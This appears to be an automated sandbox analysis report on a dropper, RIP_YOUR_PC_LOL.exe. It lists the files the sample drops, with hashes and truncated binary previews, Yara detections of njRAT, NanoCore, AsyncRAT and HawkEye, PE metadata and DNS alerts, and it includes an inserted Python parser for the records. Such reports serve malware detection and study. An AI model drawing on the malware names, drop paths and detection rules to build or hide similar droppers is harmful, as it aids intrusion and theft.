                                                                                                        SHA-512:854B93FB6B9BF0FE4CAEF5572935852CE8BECF2BC7BD41B192A4B3CEFB7854A2405C6C0C06BBDD4E1026FF9440EC753911DCC935FE68118E322614C1B918E400
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H..u...u...u...~...u.......u.......u.C.{...u...y...u...f...u...f...u...t.`.u.C.(...u...~...u.(.~...u.(.....u...u...u...s...u.Rich..u.........PE..L.....ca............................5.............@.........................................................................xi.......................................................................................................................text............................... ..`.rdata.............................@..@.data....@....... ..................@....rsrc............ ..................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1484512
                                                                                                        Entropy (8bit):7.99205858382872
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:XsoFdKkWRoohlLUI9AMNo9p2mbfmqFycZm4lZD3Ya10Hue4MBSYcQkEaHNYK3Kyh:XrHW6ilLU1Eor3Fg4lBIM0Hue1BSYcQ4
                                                                                                        MD5:52CFD35F337CA837D31DF0A95CE2A55E
                                                                                                        SHA1:88EB919FA2761F739F02A025E4F9BF1FD340B6FF
                                                                                                        SHA-256:5975E737584DDF2601C02E5918A79DAD7531DF0E13DCA922F0525F66BEC4B448
                                                                                                        SHA-512:B584282F6F5396C3BBED7835BE67420AA14D11B9C42A88B0E3413A07A6164C22D6F50D845D05F48CB95D84FD9545D0B9E25E581324A08B3A95CED9F048D41D73
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O...............0.............. ... ........@.. ....................... <.. ..-A6.....................................|L7.........r........................................................................................................................ ......................@....rsrc.... ..........................@............ ..........................@............ ..........................@............ 5.. ...V..................@....uxD5Xzb.....@7.....................@....adata... ....<.....................@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):122880
                                                                                                        Entropy (8bit):7.206630188700291
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:zMJQH6NvccnsXOf4qhi01sXT0RZTF27rcAXIlWMhBN2/MTDM:zMxsU9i0iXT0RZo7Iwhec/MTD
                                                                                                        MD5:860AA57FC3578F7037BB27FC79B2A62C
                                                                                                        SHA1:A14008FE5E1EB88BF46266DE3D5EE5DB2E0A722B
                                                                                                        SHA-256:5430565C4534B482C7216A0AE75D04E201EE0DB0386682C0C010243083C28D29
                                                                                                        SHA-512:6639B3E2594E554C7FA811F22E1C514474D34220155B4C989AD8716DB1A0AEA65894AA23D78C12A4618C57312DA00353A77DD8E6C6BDD927BF865F2E98AFF8F1
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S............................n.... ........@.. .......................@............@................................. ...K............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H.......t................5..x............................................ .........%.....(......... t........%.....(.........*..V~....(....~....o....*....(....*R .l..q..(-........*....0..........~.........E........................-...~.... .... ....(...+..t....,... ......[.+..+......(....(!....t....('...........t..........(......u.... .... ....(...+(....~.... ....~.... .....~.... .....X.k_.*.*.....(....*.(....t....~....o@...()....f..(...+.....*....0..........(*....I.U(...+..
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37888
                                                                                                        Entropy (8bit):5.575438262402469
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HLWZcaCisD/WRdL5kyc/Ss4fzrngNsIhOrAF+rMRTyN/0L+EcoinblneHQM3epzN:iZcID5nc/Ss4HysIsrM+rMRa8NuM0t
                                                                                                        MD5:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        SHA1:24BF069E9F2A1F12AEFA391674ED82059386B0AA
                                                                                                        SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
                                                                                                        SHA-512:52388313B21F14AA69C8B37E0FE0B73F66AA92F08651A16C820AAE65D341DC1AF6B48F3C8D4F657AC990EEAF4B9A01AE769BCA4D3625550011708697D22B69CC
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a................................ ........@.. ....................................@.....................................W.......@............................................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........e...E..........................................................&.(......**..(......*.s.........s.........s.........s..........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3733504
                                                                                                        Entropy (8bit):7.794569867865562
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:98304:pAdy2TU151ZIpH8YcItGTHF+iSfI77agdayaW/ej:gy5Ls8YcItWFXlWZVy
                                                                                                        MD5:6FB798F1090448CE26299C2B35ACF876
                                                                                                        SHA1:451423D5690CFFA02741D5DA6E7C45BC08AEFB55
                                                                                                        SHA-256:B4F86FF48C5F6B01E0AD4543FB78E0435E81F3EC2AACA89866862157C0DACF4F
                                                                                                        SHA-512:9CC2421A2F3AB01D15BE62A848947B03F1A8212CFD923573CF70F8C10BD8D124AEE3B251828834236AF291EA12450AC2580A712E53A022CE11B4D71B0357D8C3
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..................8...........9.. ... 9...@.. .......................`9...........@...................................9.W.... 9......................@9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc........ 9.......8.............@..@.reloc.......@9.......8.............@..B..................9.....H.......@.9.............`!....8..........................................0..f.......r...pr#..p(....t.....r9..p(.......+..........i].a...X....i2..(....o....................(......(....&*...0..q.......(.......o......s......o.....+*.o....u....,..o....t.....(....,..o.......&.o....-....,..o........,..o.....s....z..*...........=R..........P^........8............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Res
                                                                                                        Process:C:\Users\user\AppData\Roaming\gay.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37888
                                                                                                        Entropy (8bit):5.575438262402469
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HLWZcaCisD/WRdL5kyc/Ss4fzrngNsIhOrAF+rMRTyN/0L+EcoinblneHQM3epzN:iZcID5nc/Ss4HysIsrM+rMRa8NuM0t
                                                                                                        MD5:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        SHA1:24BF069E9F2A1F12AEFA391674ED82059386B0AA
                                                                                                        SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
                                                                                                        SHA-512:52388313B21F14AA69C8B37E0FE0B73F66AA92F08651A16C820AAE65D341DC1AF6B48F3C8D4F657AC990EEAF4B9A01AE769BCA4D3625550011708697D22B69CC
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a................................ ........@.. ....................................@.....................................W.......@............................................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........e...E..........................................................&.(......**..(......*.s.........s.........s.........s..........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46080
                                                                                                        Entropy (8bit):5.459376005695359
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:EuwCNToEjaNLWU3zKZmo2q7C8V1vBTcPI1zjbkgX3ir64oRfdwQfybTWVABDZTx:EuwCNToqaS2z8VnTh13brXSr64oZSbZH
                                                                                                        MD5:7E50B292982932190179245C60C0B59B
                                                                                                        SHA1:25CF641DDCDC818F32837DB236A58060426B5571
                                                                                                        SHA-256:A8DDE4E60DB080DFC397D7E312E7E9F18D9C08D6088E8043FEEAE9AB32ABDBB8
                                                                                                        SHA-512:C6D422D9FB115E1B6B085285B1D3CA46ED541E390895D702710E82A336F4DE6CC5C9183F8E6EBE35475FCCE6DEF8CC5FFA8EE4A61B38D7E80A9F40789688B885
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\test.exe, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\test.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................N.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...m.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...
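The listing above names a dropped file only indirectly (through the Source: field of its Yara hits), repeats the same 37888-byte njRAT binary under two names, and flags a file as Encrypted from its 8-bit entropy. The following Python is an added example for working with such records, not code from Joe Sandbox or from the report: it parses an excerpt copied (and trimmed to the fields it uses) from the records above, groups them by SHA-256 so re-dropped copies are recognised, rebuilds the parent-to-child drop chain from the Process: field, and recomputes Shannon entropy the way the Entropy (8bit) column is understood here. The 7.95 threshold for the Encrypted flag is an assumption chosen to separate the values in this listing, not Joe Sandbox's documented cut-off; records with no Yara hit have no path in the listing, so they are keyed by hash rather than given an invented name.

```python
import hashlib
import math
import re
from collections import defaultdict

# Constructed excerpt: five records copied from the dropped-files listing
# above, trimmed to the fields this parser uses.
REPORT_EXCERPT = r"""
Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
Size (bytes):913920
Entropy (8bit):7.376805169532317
Encrypted:false
SHA-256:D1330D349BFBD3AEA545FA08EF63339E82A3F4D04E27216ECC4C45304F079264
Yara Hits:
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
Size (bytes):3733504
Entropy (8bit):7.794569867865562
Encrypted:false
SHA-256:B4F86FF48C5F6B01E0AD4543FB78E0435E81F3EC2AACA89866862157C0DACF4F
Yara Hits:
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
Process:C:\Users\user\AppData\Roaming\healastounding.exe
Size (bytes):37888
Entropy (8bit):5.575438262402469
Encrypted:false
SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
Yara Hits:
• Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Joe Security
Process:C:\Users\user\AppData\Roaming\gay.exe
Size (bytes):37888
Entropy (8bit):5.575438262402469
Encrypted:false
SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
Yara Hits:
• Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Joe Security
Process:C:\Users\user\AppData\Roaming\healastounding.exe
Size (bytes):1484512
Entropy (8bit):7.99205858382872
Encrypted:true
SHA-256:5975E737584DDF2601C02E5918A79DAD7531DF0E13DCA922F0525F66BEC4B448
"""

# The dropped file's own path appears only inside a Yara hit's Source: field.
YARA_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<source>.+?),\s*Author:")

# Assumed cut-off for the Encrypted flag (not a documented Joe Sandbox value).
ENCRYPTED_THRESHOLD = 7.95


def parse_records(text):
    """One dict per record; a record starts at a 'Process:' (parent) line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            current = {"yara": [], "path": None}
            records.append(current)
        if current is None:
            continue
        if line.startswith("•"):
            m = YARA_RE.search(line)
            if m:
                current["yara"].append(m.group("rule"))
                current["path"] = m.group("source")
            continue
        key, sep, value = line.partition(":")  # split at the first colon only
        if sep:
            current[key.strip()] = value.strip()
    return records


def group_by_sha256(records):
    """SHA-256 -> records; a group of two or more is one file dropped under several names."""
    groups = defaultdict(list)
    for r in records:
        groups[r["SHA-256"]].append(r)
    return dict(groups)


def drop_tree(records):
    """Parent process -> sorted children; unnamed files are keyed by their hash."""
    tree = defaultdict(list)
    for r in records:
        tree[r["Process"]].append(r["path"] or "sha256:" + r["SHA-256"])
    return {parent: sorted(children) for parent, children in tree.items()}


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 for uniform, 8.0 for random)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_encrypted(entropy, threshold=ENCRYPTED_THRESHOLD):
    return entropy > threshold


def matches_record(data, record):
    """True when a retrieved sample has the record's SHA-256 and size."""
    return (hashlib.sha256(data).hexdigest().upper() == record["SHA-256"].upper()
            and len(data) == int(record["Size (bytes)"]))


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    for sha, group in group_by_sha256(recs).items():
        if len(group) > 1:
            print("same file under several names:", [r["path"] for r in group])
    for parent, children in drop_tree(recs).items():
        print(parent, "->", children)
```

Running it on the excerpt reports the njRAT binary as gay.exe and mediaget.exe with one hash, and shows the chain RIP_YOUR_PC_LOL.exe -> healastounding.exe -> gay.exe -> mediaget.exe; the 1484512-byte file written by healastounding.exe stays keyed by its SHA-256 because the listing gives it no name.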
                                                                                                        Process:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):806912
                                                                                                        Entropy (8bit):7.921653477744872
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:f7hffPYBJUtGpCXX3dquvU9ckRvYLpZjQaYM8l:NfLtGoDs9cXpJG
                                                                                                        MD5:4A72E30C0A582B082030ADFD8345014F
                                                                                                        SHA1:2F92CCF13F8DFC7EEFF49903A0D1EA8DD97A7353
                                                                                                        SHA-256:E1315C41F50A75C308CDB023F7E48C0AA62931D5771AD8BC4220018ED5D7F976
                                                                                                        SHA-512:8A75925B0695284105856823190531DC4CFCF32A8AE3226EF8C1F796185AA01F8C085B6457A63B1CF81842DA2C6BAAFD4CABF7565A8D96D3460054439BBFB798
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Process:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):76248
                                                                                                        Entropy (8bit):6.357076953831382
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:WH8tImFvh/tAoX/V1d/Xc81qsWjcdTxekxemB:WH8imz/H111TxfAmB
                                                                                                        MD5:A8DDACE9435FE395325FC45DDE8BD0A3
                                                                                                        SHA1:DCF9BAAA9E3A27450DEBF4F35112376ED005C800
                                                                                                        SHA-256:6E81D7C71B3E8D731E11AD75D3DAC02A4210C9F90FAC618AF5C00CBCE3718658
                                                                                                        SHA-512:2C6006E42ECF31DA02A4584E69C0E55390BE5A405353307582852728B2CEB65033F3F5CD0B6465B3A1541D19EAB95C61B394E3403DEE558196C2F2969D82B196
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Process:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):995328
                                                                                                        Entropy (8bit):6.19848257170581
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:BT8s5nv9sQ1ViVNEPazI+eGGhFqxVOa+28WXvC:BT8MnlsQ1kVqPv+eDhGwdIvC
                                                                                                        MD5:07A36097730666FE9E5434D85A5AB989
                                                                                                        SHA1:780CA47C15932ED1F9640C17B9BB340410A52338
                                                                                                        SHA-256:1FB4CEE4D83D424E0BFCBFD97169EF717B3EBDCC5D01BA7C7C547AE606AD5C3C
                                                                                                        SHA-512:4A08080471C660856AF724E4480EC721C22C462346E293D93E2F9577E6D669C6B51CD81EF96DFAD943C791DFD7F7F0C2D5234A82D81CE5F1C01BB493CDA34085
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Windows\Help\active_desktop_render.dll, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.788951719729708
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.63%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.58%
                                                                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.41%
                                                                                                        • InstallShield setup (43055/19) 0.21%
                                                                                                        • UPX compressed Win32 Executable (30571/9) 0.15%
                                                                                                        File name:RIP_YOUR_PC_LOL.exe
                                                                                                        File size:23633920
                                                                                                        MD5:52867174362410d63215d78e708103ea
                                                                                                        SHA1:7ae4e1048e4463a4201bdeaf224c5b6face681bf
                                                                                                        SHA256:37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
                                                                                                        SHA512:89e17e147d3f073e479e85d0b0321f6264bbc2aa84c930ed645e8f5cde3f1e58812c3db1ba0f10bee6ce7ac0731e1e3de6747a9b3c4d63a564dd8d904bd726ab
                                                                                                        SSDEEP:393216:HJLgf7BPkdKzrZciLxv8naSNtPr5rn57M84UTB9xO5/VWvJKJPkwdnfZ4y5SDkFV:poBPQwxMR7pn5qUTB9xOFVWvJKJPkwd9
                                                                                                        Icon Hash:00828e8e8686b000
                                                                                                        Entrypoint:0x1a8b4ae
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x61B51365 [Sat Dec 11 21:08:53 2021 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:v2.0.50727
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x168b454        0x57          .text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x168c000        0x598         .rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x168e000        0xc           .reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                                                        Name    Virtual Address  Virtual Size  Raw Size   Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                                                        .text   0x2000           0x16894b4     0x1689600  unknown   unknown          unknown    unknown         IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc   0x168c000        0x598         0x600      False     0.421223958333   data       4.08611300158   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc  0x168e000        0xc           0x200      False     0.044921875      data       0.118369631259  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        Name         RVA        Size   Type                                                                         Language  Country
                                                                                                        RT_VERSION   0x168c0a0  0x304  data
                                                                                                        RT_MANIFEST  0x168c3a8  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                        DLL          Import
                                                                                                        mscoree.dll  _CorExeMain
| Description | Data |
|---|---|
| Translation | 0x0000 0x04b0 |
| LegalCopyright | emerge brutal |
| Assembly Version | 14.5.48.86 |
| InternalName | foampounding.exe |
| FileVersion | 14.5.48.86 |
| CompanyName | brawler |
| ProductName | open |
| ProductVersion | 14.5.48.86 |
| FileDescription | earfalserust |
| OriginalFilename | foampounding.exe |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 03/08/22-18:01:02.530765 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51748 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:01:29.841168 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49695 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:01:52.276662 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61607 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:29.169253 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52858 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:48.436398 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59871 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:48.491531 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50029 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:48.738596 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51194 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:53.688495 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50081 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:56.227160 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 55083 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:02:58.743158 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59106 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:03:09.787643 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61152 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:03:11.689559 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49679 | 8.8.8.8 | 192.168.2.6 |
| 03/08/22-18:03:22.042737 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52225 | 8.8.8.8 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 8, 2022 18:00:25.222332954 CET | 192.168.2.6 | 8.8.8.8 | 0x72ed | Standard query (0) | store-images.s-microsoft.com | A (IP address) | IN (0x0001)
